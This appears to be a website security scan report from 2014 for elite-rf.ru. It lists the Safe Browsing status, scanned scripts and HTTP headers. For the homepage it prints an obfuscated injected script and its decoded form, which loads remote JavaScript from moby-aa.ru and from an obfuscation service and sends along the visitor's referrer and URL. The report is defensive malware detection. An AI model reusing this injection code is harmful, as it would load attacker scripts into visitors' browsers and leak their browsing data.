Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=elite-rf.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://elite-rf.ru/ | 200 OK Content-Length: 253540 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: moby-aa.ru var OlO='==wOpkSZwF2YzV2XoUGchN2cl5WdoUGdpJ3duQnbl1Wdj9GZ7kyTP9EKkxWaoNEZuVGcwFmLPlEbKsTXwsVKnQWYlh2JoUWbh50ZhRVeCNHduVWblxWR0V2ZuQnbl1Wdj9GZg0DIPlEbgIXY2pwOpwkUV5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0DbyVnJnsSKyVmcyVmZlJnL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPmVmcmcyKns2b9MmczRXZn9zLt92YuUGdhN2c1ZmYvlXbukGch9yL6AHd0h2Jg0DIjJ3cu80TPpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9AyTP9EIyFmd7cSRzUCdwlmcjN3LDNTJFNTJyITJwkDMyQ0MlQWaGNTJzp2L1JnLhFWL5 ...[953 bytes skipped]... Decoded script: var _escape='%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//moby-aa.ru/js%3Fid%3D2090%22%3E%3C/script%3E';var OOO = document.createElement('script'); OOO.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var lIO = document.getElementsByTagName('head')[0]; lIO.appendChild(OOO);document.write(unescape(_escape)); var _escape='%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//moby-aa.ru/js%3Fid%3D2090%22%3E%3C/script%3E';var OOO = document.createElement('script'); OOO.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var lIO = document.getElementsByTagName('head')[0]; lIO.appendChild(OOO);document.write(unescape(_escape)); | ||
http://elite-rf.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 95132 Content-Type: text/javascript | clean |
http://elite-rf.ru/media/system/js/core.js | 200 OK Content-Length: 4775 Content-Type: text/javascript | clean |
http://elite-rf.ru/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: text/javascript | clean |
http://elite-rf.ru/media/system/js/validate.js | 200 OK Content-Length: 2923 Content-Type: text/javascript | clean |
http://elite-rf.ru/plugins/system/jcemediabox/js/jcemediabox.js?version=113 | 200 OK Content-Length: 54726 Content-Type: text/javascript | clean |
http://elite-rf.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 238331 Content-Type: text/javascript | clean |
http://elite-rf.ru/plugins/system/rokbox/rokbox.js | 200 OK Content-Length: 21801 Content-Type: text/javascript | clean |
http://elite-rf.ru/plugins/system/rokbox/themes/light/rokbox-config.js | 200 OK Content-Length: 2598 Content-Type: text/javascript | clean |
http://elite-rf.ru/libraries/gantry/js/gantry-totop.js | 200 OK Content-Length: 378 Content-Type: text/javascript | clean |
http://elite-rf.ru/templates/rt_nebulae_j16/js/gantry-module-scroller.js | 200 OK Content-Length: 2645 Content-Type: text/javascript | clean |
http://elite-rf.ru/libraries/gantry/js/gantry-smartload.js | 200 OK Content-Length: 2815 Content-Type: text/javascript | clean |
http://elite-rf.ru/libraries/gantry/js/gantry-buildspans.js | 200 OK Content-Length: 698 Content-Type: text/javascript | clean |
http://elite-rf.ru/libraries/gantry/js/gantry-inputs.js | 200 OK Content-Length: 3831 Content-Type: text/javascript | clean |
http://elite-rf.ru/modules/mod_roknavmenu/themes/fusion/js/fusion.js | 200 OK Content-Length: 25425 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: elite-rf.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 09 Aug 2014 01:22:21 GMT
Pragma: no-cache
Server: Apache/2.2.15 (Red Hat) PHP/5.3.27
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 0cb7b32aba0399b156f4d4f00c36036c=4cskp5l42jof0apggfheqoj706; path=/
X-Cache: MISS from turbine1.ht-systems.ru
X-Cache-Lookup: MISS from turbine1.ht-systems.ru:6666
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: elite-rf.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 09 Aug 2014 01:22:21 GMT
Pragma: no-cache
Server: Apache/2.2.15 (Red Hat) PHP/5.3.27
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 0cb7b32aba0399b156f4d4f00c36036c=4cskp5l42jof0apggfheqoj706; path=/
X-Cache: MISS from turbine1.ht-systems.ru
X-Cache-Lookup: MISS from turbine1.ht-systems.ru:6666
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: elite-rf.ru
Referer: http://www.google.com/search?q=elite-rf.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: elite-rf.ru
Referer: http://www.google.com/search?q=elite-rf.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.